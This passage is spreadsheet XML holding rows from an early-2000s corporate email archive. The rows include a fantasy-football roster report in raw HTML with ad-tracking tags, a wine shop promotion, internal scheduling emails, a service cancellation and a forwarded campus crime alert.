&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1109&amp;team=13&amp;"&gt;Faulk, Marshall&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;STL&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;RB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Active&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;IND&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week 8&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1211&amp;team=13&amp;"&gt;Pickens, Carl&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;&amp;nbsp;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Active&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;bye&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=12306&amp;team=13&amp;"&gt;Crowell, Germane&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;DET&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Active&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;CHI&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week 3&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1286&amp;team=13&amp;"&gt;Galloway, Joey&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;DAL&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Active&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;SF&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week 6&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1385&amp;team=13&amp;"&gt;Conway, Brett&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;WAS&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;K&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Active&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;@NO&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week 9&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=13&amp;team=13&amp;"&gt;Jaguars&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;JAC&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;DT&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Active&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;KC&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week 5&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1019&amp;team=13&amp;"&gt;Aikman, Troy&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;&amp;nbsp;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;QB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Reserve&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;bye&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;[Morris, Bam]&lt;/TD&gt;&lt;TD class=TD2 &gt;&amp;nbsp;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;RB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Reserve&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;bye&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1782&amp;team=13&amp;"&gt;Barber, Tiki&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;NYG&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;RB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Reserve&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;@PHI&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week 12&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=133393&amp;team=13&amp;"&gt;Price, Peerless&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;BUF&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Reserve&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;@NYJ&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week 5&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=12795&amp;team=13&amp;"&gt;Ward, Hines&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;PIT&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Reserve&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;@CIN&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week 2&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=24&amp;team=13&amp;"&gt;Chargers&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;SD&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;DT&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Reserve&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;SEA&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week 17&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;/TABLE&gt;&lt;FONT SIZE=2 FACE="Arial, Helvetica"&gt;&lt;BR&gt;Total Active Players: 8&lt;BR&gt;Total Reserve Players: 6&lt;BR&gt;&lt;BR&gt;&lt;FONT SIZE=3&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;B&gt;NFL Injuries for Grigsby&lt;/B&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;TABLE  BGCOLOR="#f0f0f0" WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=1&gt;&lt;TR BGCOLOR="#e0e6df"&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Updated&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Player&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Team&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Pos&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Injury&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;_x000D_
Expected Return&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 ALIGN=middle&gt;10/24/01&lt;/TD&gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=12306&amp;"&gt;Crowell, Germane&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;DET&lt;/TD&gt;&lt;TD class=TD2 &gt;WR&lt;/TD&gt;&lt;TD class=TD2 &gt;Knee&lt;/TD&gt;&lt;TD class=TD2 &gt;On IR. Out for the rest of the season.&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 ALIGN=middle&gt;12/21/01&lt;/TD&gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=1109&amp;"&gt;Faulk, Marshall&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;STL&lt;/TD&gt;&lt;TD class=TD2 &gt;RB&lt;/TD&gt;&lt;TD class=TD2 &gt;Knee&lt;/TD&gt;&lt;TD class=TD2 &gt;Expected to start&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 ALIGN=middle&gt;12/21/01&lt;/TD&gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=players&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;key=133393&amp;"&gt;Price, Peerless&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;BUF&lt;/TD&gt;&lt;TD class=TD2 &gt;WR&lt;/TD&gt;&lt;TD class=TD2 &gt;Ankle&lt;/TD&gt;&lt;TD class=TD2 &gt;Expected to play this week&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;/TABLE&gt;&lt;TABLE WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=0 BGCOLOR="#000099"&gt;&lt;TR&gt;&lt;TD ALIGN=left&gt;&lt;FONT FACE=arial color=ffffff SIZE=&gt;&lt;B&gt;Transactions,&amp;nbsp;View&amp;nbsp;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;!-- Pizzahut Presenting Logo Spotlight tag - Do not remove until 12-31-01 --&gt;_x000D_
&lt;SCRIPT language="JavaScript"&gt;_x000D_
if (!random) {if (parent.random) {var random = parent.random} else {var abc = Math.random() + ""; var random = abc.substring(2,abc.length);}}_x000D_
document.write('&lt;IMG SRC="http://ad.doubleclick.net/ad/N1549.sportsline.com/B44933.5;sz=1x1;ord=o;ord='+random+'?" WIDTH=1 HEIGHT=1 BORDER=0&gt;');_x000D_
&lt;/SCRIPT&gt;_x000D_
&lt;NOSCRIPT&gt;_x000D_
&lt;IMG SRC="http://ad.doubleclick.net/ad/N1549.sportsline.com/B44933.5;sz=1x1;ord=1?" WIDTH=1 HEIGHT=1 BORDER=0&gt;_x000D_
&lt;/NOSCRIPT&gt;_x000D_
&lt;!-- end Pizzahut Logo Spotlight tag --&gt;_x000D_
&lt;CENTER&gt;&lt;TABLE BGCOLOR="#bfbfbf" BORDER=2 CELLSPACING=0 CELLPADDING=0&gt;&lt;TR&gt;&lt;TD&gt;_x000D_
&lt;TABLE BORDER=0 CELLSPACING=0 CELLPADDING=2&gt;_x000D_
&lt;TR BGCOLOR=#00007f&gt;_x000D_
&lt;TD COLSPAN=3&gt;_x000D_
&lt;TABLE WIDTH=100% BORDER=0 CELLSPACING=0 CELLPADDING=0&gt;_x000D_
&lt;TR&gt;&lt;TD VALIGN=middle ALIGN=left&gt;&lt;IMG HSPACE=2 VSPACE=2 WIDTH=14 HEIGHT=14 SRC="http://images.commissioner.com/images/eye_device_tiny.gif"&gt;&amp;nbsp;&lt;FONT SIZE=2&gt;&lt;FONT COLOR="#ffffff"&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;B&gt;Warning&lt;/B&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;_x000D_
&lt;/TD&gt;_x000D_
&lt;TD ALIGN=right VALIGN=middle&gt;_x000D_
&amp;nbsp;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=home&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;"&gt;&lt;IMG BORDER=0 ALIGN=absmiddle HSPACE=2 SRC="http://images.commissioner.com/images/wizard/win95/x.gif"&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;_x000D_
&lt;TD WIDTH=25&gt;&lt;BR&gt;&lt;/TD&gt;_x000D_
&lt;TD WIDTH=400 HEIGHT=120&gt;&lt;FONT FACE="Arial, Helvetica" SIZE=2&gt;&lt;TABLE WIDTH=100% BORDER=0 CELLPADDING=0 CELLSPACING=0&gt;&lt;TR&gt;&lt;TD WIDTH=10&gt;&lt;/TD&gt;&lt;TD WIDTH=60&gt;&lt;IMG SRC="http://images.commissioner.com/images/exclamation.gif"&gt;&lt;/TD&gt;&lt;TD&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;There are no League Transactions at this time.&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/FONT&gt;&lt;/TD&gt;_x000D_
&lt;TD WIDTH=25&gt;&lt;BR&gt;&lt;/TD&gt;_x000D_
&lt;/TR&gt;_x000D_
&lt;TR&gt;_x000D_
&lt;TD COLSPAN=4 HEIGHT=50 ALIGN=middle&gt;_x000D_
&lt;HR&gt;_x000D_
&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/home&amp;league=ee&amp;owner=96876.9&amp;random=4312&amp;"&gt;&lt;IMG BORDER=0 SRC="http://images.commissioner.com/images/wizard/OK.gif"&gt;&lt;/A&gt;&lt;/TD&gt;_x000D_
&lt;/TR&gt;&lt;/TABLE&gt;_x000D_
&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;_x000D_
&lt;/CENTER&gt;&lt;IMG WIDTH=1px HEIGHT=1px SRC="http://football292.fantasy.sportsline.com/mp/open_gif?splnid=6c9f5755f428de1a&amp;league=ee&amp;owner=96876.9&amp;email=7e42a28a21d85b828ac4d9d45fbd98b6927b929c31cf0865&amp;sport=football&amp;vend=CBS%20SportsLine.com&amp;product=mgmt&amp;time=20011226&amp;type=ereport&amp;random=4312"&gt;&lt;HR&gt;&lt;CENTER&gt;Copyright 2001 Commissioner.COM Inc and SportsLine.com Inc.&lt;BR&gt;Your site can be reached from &lt;A HREF=http://fantasy.sportsline.com&gt;http://fantasy.sportsline.com&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;FB10SP&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;</t>
  </si>
  <si>
    <t>Tue, 26 Sep 2000 05:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: So long--- Farewell!!</t>
  </si>
  <si>
    <t>good luck...I'm sure you'll do well!  Have fun_x000D_
_x000D_
fletch</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 13:25:59 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'email@christopherswine.com'})</t>
  </si>
  <si>
    <t>The most popular wines from recent samplers together in one  case,_x000D_
 schedule, another limited Italian</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon wine lovers,_x000D_
Over the past three weeks, I have been monitoring the feedback from those of you who have purchased the weekly sampler cases.  And it appears that we have found some winners.  While all the wines have been well-received, the ones below have gained a serious following in just three short weeks.  To give the rest of you a chance to see what all the buzz is about, and to help the regulars re-stock their wine racks after the Thanksgiving feast, I have put together our most recent sampler.  As always, it comes with a special price, too._x000D_
_x000D_
THE BEST FROM RECENT SAMPLER CASES, TOGETHER AT LAST (2 BTLS EACH): _x000D_
_x000D_
Finca Flichman Cabernet Mendoza Argentina 1999 (full bodied, concentrated fruit) 87 points _x000D_
Finca Flichman Malbec Mendoza Argentina 1998 (intense color, maximum Malbec expression) 87 points  _x000D_
Vina Sardasol Cabernet Crianza 1995 (how did they get so much flavor at this price?!) 88 points  _x000D_
L'Enclave des Papes Cabernet 2000 (surprising depth, mature fruit components) 87 points _x000D_
Chateau LaCroix Martelle Minervois 1999 (you may remember this, my house red, serious Syrah) 89 points  _x000D_
Domaine Capouilleres Ventoux 1998 (so full of blue fruits, loves the spicy stuff) 87 points  _x000D_
_x000D_
Let me tell you, this case is already a bargain at $155!!!_x000D_
LOAD UP, THIS WEEK ONLY (IF THEY LAST THAT LONG) FOR JUST $132 PLUS TAX!!!_x000D_
Now most of you know that these cases disappear before the week's end.  So pick up the phone and call us now with your card number and we will be happy to set as many of these aside as you would like.  Don't miss out!  This is one heck of a great  buy!!!_x000D_
As for the schedule:_x000D_
_x000D_
THURSDAY, NOVEMBER 29th:_x000D_
Topic: "UNBELIEVABLE CABERNET &amp; MERLOT VALUES"_x000D_
Time: 6-8 PM (Champagne reception at 5:30 PM)_x000D_
We will be tasting through and discussing 8 of the best values in my store!_x000D_
Price per person: $18 plus tax_x000D_
RESERVATIONS ARE REQUIRED_x000D_
Please contact the store to reserve your seats_x000D_
713-524-9144_x000D_
FRIDAY, NOVEMBER 30TH:_x000D_
WINE BAR AT CHRISTOPHER'S_x000D_
For all of you who have visited over the past several weeks: _x000D_
Thank you for making this such a fabulous success!!!_x000D_
If you have not yet visited the Wine Bar on Friday, here are some details:_x000D_
We offer 45 wines by the glass to include reds, whites, sparkling wines &amp; after dinner wines, too._x000D_
Our amazingly talented Chef prepares 4 new menu items each week._x000D_
In addition to the wines by the glass list, you may choose ANY wine in the store _x000D_
to enjoy with your foods or friends._x000D_
BEST PART???_x000D_
Retail prices for all wines, NOT restaurant prices!!!_x000D_
Our wines by the glass range from $4 to $15 &amp;_x000D_
Our Chef's specials range from $10 to $22._x000D_
No reservations are needed._x000D_
Get here early for the best seats._x000D_
Time: 6-10 PM Friday nights_x000D_
Location: here at Christopher's _x000D_
YOU HAVE GOT TO CHECK THIS OUT, IT IS A BLAST!!!_x000D_
SATURDAY, DECEMBER 1ST:_x000D_
CUSTOMER APPRECIATION DAY_x000D_
This Saturday, from 2-5 PM, please be our guest for this free tasting._x000D_
We will be showcasing 6 new wines from around the world._x000D_
California, France, Italy &amp; Spain will all be open for tasting._x000D_
No reservations are required._x000D_
Super special discounts during the  tasting._x000D_
All new wines, never before seen at the bar._x000D_
Get here early for best selection._x000D_
Time: 2-5 PM_x000D_
Here at Christopher's_x000D_
No Charge_x000D_
Bring some friends and have a great tasting!!!_x000D_
_x000D_
How about something for the cellar?  Or as an early gift for your own stocking??? _x000D_
Falesco Montiano 1999 (from the master himself, Cotarella, 2500 cases for the world, 24 bottles for us)  _x000D_
_x000D_
                95 points from Parker_x000D_
                LIMITED TO 2 BOTTLES PER CUSTOMER, $70 EACH, NET_x000D_
Well, I guess I'll head to the phones.  Call us at 713-524-9144._x000D_
Your friend in wine,_x000D_
Christopher_x000D_
"BEST WINE STORE" HOUSTON PRESS 2001_x000D_
2516 Times BLVD_x000D_
Rice Village_x000D_
713-524-9144www.christopherswine. com </t>
  </si>
  <si>
    <t>Thu, 8 Feb 2001 19:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'james.weitekamp@enron.com', 'mary.botello@enron.com'})</t>
  </si>
  <si>
    <t>Re: Upload Schedule</t>
  </si>
  <si>
    <t>Has Lee agreed to help us run plan assessments on Feb. 20?_x000D_
---------------------- Forwarded by Tracy Geaccone/GPGFIN/Enron on 02/08/2001 03:17 PM ---------------------------_x000D_
   _x000D_
	  From:  Elaine Concklin                           02/08/2001 12:58 PM	_x000D_
		_x000D_
_x000D_
_x000D_
To:	Tracy Geaccone/GPGFIN/Enron@ENRON_x000D_
cc:	James Weitekamp/GPGFIN/Enron@ENRON _x000D_
_x000D_
Subject:	Re: Upload Schedule   _x000D_
_x000D_
I think Mike was referring to the revised time table that we discussed in the last upload meeting.  We were going to have all templates uploaded by the 15th, then work with Lee to schedule running the plan assessments on the 20th, etc.  You had mentioned that you would publish the target dates after talking to Lee._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Tracy Geaccone_x000D_
02/08/2001 09:28 AM_x000D_
To:	James Weitekamp/GPGFIN/Enron@ENRON_x000D_
cc:	Elaine Concklin/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject:	Upload Schedule_x000D_
_x000D_
Please forward CC upload and FAR upload template._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Tracy Geaccone/GPGFIN/Enron on 02/08/2001 09:30 AM ---------------------------_x000D_
   _x000D_
	  From:  Mike Zabawa                           02/08/2001 08:05 AM	_x000D_
		_x000D_
_x000D_
_x000D_
To:	Tracy Geaccone/GPGFIN/Enron@ENRON_x000D_
cc:	David Clements/ET&amp;S/Enron@ENRON, Nancy Wood/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject:	Upload Schedule_x000D_
_x000D_
Tracy,_x000D_
_x000D_
Have you published the final upload schedule?  If so, I was not on the distribution list._x000D_
_x000D_
Thanks!_x000D_
_x000D_
MZ_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&lt;Embedded StdOleLink&gt;</t>
  </si>
  <si>
    <t>Tue, 11 May 1999 09:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Entergy</t>
  </si>
  <si>
    <t>I'm trying to get a copy of the agreement on the gas side to see what you've _x000D_
done before.  Debbie Brackett says she knows what agreement you're talking _x000D_
about.  I'll keep you posted.</t>
  </si>
  <si>
    <t>Mon, 5 Feb 2001 09:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'custcare@palm.net'})</t>
  </si>
  <si>
    <t>Re: Credit Card Expiration Approaching</t>
  </si>
  <si>
    <t xml:space="preserve">Please cancel the Palm.Net service effective immediately.  I am no longer _x000D_
using the Palm Pilot and therefore do not need the Palm.Net service._x000D_
_x000D_
Thank you for your assistance._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
custcare@palm.net on 02/01/2001 10:04:28 PM_x000D_
To: mike.mcconnell@enron.com_x000D_
cc:  _x000D_
Subject: Credit Card Expiration Approaching_x000D_
_x000D_
Dear Mike McConnell,_x000D_
_x000D_
The credit card you are currently using for the Palm.Net service is_x000D_
about to expire._x000D_
_x000D_
To avoid any interruption to your service, prior to your next billing date, _x000D_
please update your expiration date prior to your billing date by accessing _x000D_
the My Account/Update Credit Card Info area at www.palm.net._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Palm.Net Customer Care_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 5 Sep 2001 08:33:51 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jjensen@haas.berkeley.edu'})</t>
  </si>
  <si>
    <t>frozenset({'undergrd@haas.berkeley.edu', 'mba03@haas.berkeley.edu', 'staff@haas.berkeley.edu', 'mba02@haas.berkeley.edu', 'eveningmba@haas.berkeley.edu', 'mba01@haas.berkeley.edu', 'faculty@haas.berkeley.edu', 'visfac@haas.berkeley.edu', 'mfe02@haas.berkeley.edu', 'allphds@haas.berkeley.edu'})</t>
  </si>
  <si>
    <t>Fwd: UCPOLICE Crime Alert - Armed Robbery</t>
  </si>
  <si>
    <t>_x000D_
&gt;_x000D_
&gt;CRIME ALERT - Strong Arm Robbery_x000D_
&gt;September 1, 2001  1:25 am_x000D_
&gt;2600 block of Channing Way in front of UC Residence Halls Unit #1_x000D_
&gt;_x000D_
&gt;On Saturday morning, September 1, at about 1:25 am, two UC students were _x000D_
&gt;the victims of a strongarm robbery._x000D_
&gt;_x000D_
&gt;The two student victims were walking east on Channing Way near College Ave _x000D_
&gt;when suspect #1 came up from behind and tackled one of the students and _x000D_
&gt;struck him in the face as he fell.  The second student was punched in the _x000D_
&gt;side of his head by another suspect and dropped his cell phone.  One of _x000D_
&gt;the suspects picked up the cell phone and fled east on Channing _x000D_
&gt;Way.  Other suspects fled in an unknown direction.  No vehicle was _x000D_
&gt;seen.  The first student was taken to the hospital and treated for his _x000D_
&gt;injuries._x000D_
&gt;_x000D_
&gt;Suspect #1:_x000D_
&gt;Male, Black, 18-20 years old, 5'10", medium build, wearing a red and white _x000D_
&gt;leather jacket, blue jeans and white tennis shoes._x000D_
&gt;_x000D_
&gt;Additional suspects:_x000D_
&gt;Group of male blacks_x000D_
&gt;_x000D_
&gt;If you have any information about this crime, please contact:_x000D_
&gt;_x000D_
&gt;Berkeley Police Department_x000D_
&gt;Detective Steve Rego_x000D_
&gt;(510) 981-5742, 8am to 5pm_x000D_
&gt;(510) 981-5900, All other times_x000D_
&gt;_x000D_
&gt;OR_x000D_
&gt;_x000D_
&gt;University of California Police Department_x000D_
&gt;Criminal Investigation Bureau_x000D_
&gt;(510) 642-0472, 8am-5pm_x000D_
&gt;(510) 642-6760, All other times_x000D_
&gt;_x000D_
&gt;As with any emergency situation, if you see suspicious activity, call 9-1-1._x000D_
&gt;_x000D_
&gt;An Adobe Portable Document Format (PDF) version of this alert will be _x000D_
&gt;available at noon on Wednesday, September 5 at:_x000D_
&gt;http://public-safety.berkeley.edu/police/ca09012001.html_x000D_
&gt;_x000D_
&gt;Directions for subscribing to ucb_police_news are available at:_x000D_
&gt;http://public-safety.berkeley.edu/police/newselist.html_x000D_
&gt;_x000D_
&gt;Information on Crime Prevention Strategies can be found at:_x000D_
&gt;http://public-safety.berkeley.edu/csp/cspguide.html_x000D_
&gt;_x000D_
&gt;Victoria L. Harrison_x000D_
&gt;Chief of Police_x000D_
&gt;_x000D_
&gt;***************************************************************************_x000D_
&gt;This alert is distributed as a public service to the University_x000D_
&gt;community and in compliance with the Jeanne Clery Act of 1998._x000D_
&gt;***************************************************************************</t>
  </si>
  <si>
    <t>Mon, 15 Jan 2001 04:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Your Amazon.com order (#104-9670681-0325567)</t>
  </si>
  <si>
    <t>Hello from Amazon.com._x000D_
_x000D_
